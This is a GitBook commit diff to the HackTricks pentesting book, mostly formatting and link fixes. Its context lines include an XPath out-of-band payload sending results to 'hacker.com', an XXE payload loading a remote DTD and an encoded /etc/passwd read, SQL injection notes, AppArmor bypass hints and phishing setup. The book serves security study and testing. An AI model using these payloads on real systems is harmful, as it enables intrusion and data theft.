GitBook: [master] 11 pages and 30 assets modified
CPol
gitbook-bot
|
Before Width: | Height: | Size: 40 KiB After Width: | Height: | Size: 40 KiB |
|
Before Width: | Height: | Size: 40 KiB After Width: | Height: | Size: 40 KiB |
|
Before Width: | Height: | Size: 40 KiB After Width: | Height: | Size: 40 KiB |
|
Before Width: | Height: | Size: 40 KiB After Width: | Height: | Size: 40 KiB |
|
Before Width: | Height: | Size: 40 KiB After Width: | Height: | Size: 40 KiB |
|
Before Width: | Height: | Size: 142 KiB After Width: | Height: | Size: 142 KiB |
|
Before Width: | Height: | Size: 142 KiB After Width: | Height: | Size: 142 KiB |
|
Before Width: | Height: | Size: 142 KiB After Width: | Height: | Size: 142 KiB |
|
Before Width: | Height: | Size: 1.3 MiB After Width: | Height: | Size: 1.3 MiB |
|
Before Width: | Height: | Size: 1.3 MiB After Width: | Height: | Size: 1.3 MiB |
|
Before Width: | Height: | Size: 1.3 MiB After Width: | Height: | Size: 1.3 MiB |
|
Before Width: | Height: | Size: 1.3 MiB After Width: | Height: | Size: 1.3 MiB |
|
Before Width: | Height: | Size: 740 KiB After Width: | Height: | Size: 740 KiB |
|
Before Width: | Height: | Size: 740 KiB After Width: | Height: | Size: 740 KiB |
|
Before Width: | Height: | Size: 815 KiB After Width: | Height: | Size: 815 KiB |
@ -58,7 +58,7 @@ This tool is also useful to get **other information analysed** from the packets
|
||||
You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **\(It works in Windows\)**.
|
||||
This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**.
|
||||
|
||||
|
||||
|
||||
|
||||
### [BruteShark](https://github.com/odedshimon/BruteShark)
|
||||
|
||||
|
||||
@ -240,5 +240,3 @@ find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
|
||||
|
||||
In the weird case you can **modify the apparmor docker profile and reload it.** You could remove the restrictions and "bypass" them.
|
||||
|
||||
|
||||
|
||||
|
||||
@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
|
||||
* Signed using the **device identity certificate \(from APNS\)**
|
||||
* **Certificate chain** includes expired **Apple iPhone Device CA**
|
||||
|
||||
|
||||
|
||||
|
||||
### Step 6: Profile Installation
|
||||
|
||||
|
||||
@ -6,7 +6,7 @@
|
||||
|
||||
## Attacks Graphic
|
||||
|
||||
|
||||
|
||||
|
||||
## Tool
|
||||
|
||||
|
||||
@ -237,7 +237,7 @@ In this case there **isn't** any way to **distinguish** the **response** of the
|
||||
|
||||
You can use stacked queries to **execute multiple queries in succession**. Note that while the subsequent queries are executed, the **results** are **not returned to the application**. Hence this technique is primarily of use in relation to **blind vulnerabilities** where you can use a second query to trigger a DNS lookup, conditional error, or time delay.
|
||||
|
||||
**Oracle** doesn't support** stacked queries. **MySQL**, **Microsoft** and **PostgreSQL support** them: `QUERY-1-HERE; QUERY-2-HERE`
|
||||
**Oracle** doesn't support **stacked queries.** MySQL**,** Microsoft **and** PostgreSQL support\*\* them: `QUERY-1-HERE; QUERY-2-HERE`
|
||||
|
||||
## Out of band Exploitation
|
||||
|
||||
@ -478,5 +478,5 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
|
||||
|
||||
## Brute-Force Detection List
|
||||
|
||||
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/sqli.txt" %}
|
||||
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/sqli.txt" caption="" %}
|
||||
|
||||
|
||||
@ -322,9 +322,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
|
||||
|
||||
### Automatic tool
|
||||
|
||||
{% embed url="https://xcat.readthedocs.io/" %}
|
||||
|
||||
|
||||
{% embed url="https://xcat.readthedocs.io/" caption="" %}
|
||||
|
||||
## References
|
||||
|
||||
|
||||
@ -279,7 +279,7 @@ As this technique uses an **internal DTD you need to find a valid one first**. Y
|
||||
|
||||
In the following awesome github repo you can find **paths of DTDs that can be present in the system**:
|
||||
|
||||
{% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %}
|
||||
{% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" caption="" %}
|
||||
|
||||
Moreover, if you have the **Docker image of the victim system**, you can use the tool of the same repo to **scan** the **image** and **find** the path of **DTDs** present inside the system. Read the [Readme of the github](https://github.com/GoSecure/dtd-finder) to learn how.
|
||||
|
||||
@ -477,7 +477,7 @@ This only work if the XML server accepts the `data://` protocol.
|
||||
|
||||
### UTF-7
|
||||
|
||||
You can use the \[**"Encode Recipe**" of cyberchef here \]\([https://gchq.github.io/CyberChef/\#recipe=Encode\_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4\)to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7%20%2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to) transform to UTF-7.
|
||||
You can use the \[**"Encode Recipe**" of cyberchef here \]\(\[[https://gchq.github.io/CyberChef/\#recipe=Encode\_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7) %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4\)to\]\([https://gchq.github.io/CyberChef/\#recipe=Encode\_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7%20%2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)\) transform to UTF-7.
|
||||
|
||||
```markup
|
||||
<!xml version="1.0" encoding="UTF-7"?-->
|
||||
@ -501,7 +501,7 @@ If the web is using Java you may check the [**jar: protocol**](xxe-xee-xml-exter
|
||||
|
||||
Trick from [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)
|
||||
You can create an **entity inside an entity** encoding it with **html entities** and then call it to **load a dtd**.
|
||||
Note that the **HTML Entities** used needs to be **numeric** \(like [in this example](https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric%20entities'%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\).
|
||||
Note that the **HTML Entities** used needs to be **numeric** \(like \[in this example\]\([https://gchq.github.io/CyberChef/\#recipe=To\_HTML\_Entity%28true,'Numeric entities'%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)\](https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric%20entities'%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B%29\)\).
|
||||
|
||||
```markup
|
||||
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "<!ENTITY % dtd SYSTEM "http://ourserver.com/bypass.dtd" >" >%a;%dtd;]>
|
||||
|
||||
@ -79,3 +79,4 @@ Entry_2:
|
||||
Description: Three scans to find the names of the server
|
||||
Command: nmblookup -A {IP} &&&& nbtscan {IP}/30 &&&& nmap -sU -sV -T4 --script nbstat.nse -p 137 -Pn -n {IP}
|
||||
```
|
||||
|
||||
|
||||
@ -1,8 +1,8 @@
|
||||
# 80,443 - Pentesting Web Methodology
|
||||
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or follow me on Twitter 🐦\[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**.
|
||||
**If you want to** share some tricks with the community **you can also submit** pull requests **to \*\***[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **\*\*that will be reflected in this book.
|
||||
Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book.
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**PEASS & HackTricks telegram group here**](https://t.me/peass)**, or follow me on Twitter 🐦**[**@carlospolopm**](https://twitter.com/carlospolopm).
|
||||
**If you want to** share some tricks with the community **you can also submit** pull requests **to** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **that will be reflected in this book.
|
||||
Don't forget to** give ⭐ on the **github** to motivate me to continue developing this book.
|
||||
|
||||
## Basic Info
|
||||
|
||||
|
||||
@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml
|
||||
|
||||
If you see an error like the following one:
|
||||
|
||||
|
||||
|
||||
|
||||
It means that the server **didn't receive the correct domain name** inside the Host header.
|
||||
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
|
||||
|
||||
@ -339,7 +339,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
|
||||
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
|
||||
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
|
||||
|
||||
|
||||
|
||||
|
||||
{% hint style="info" %}
|
||||
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.
|
||||
|
||||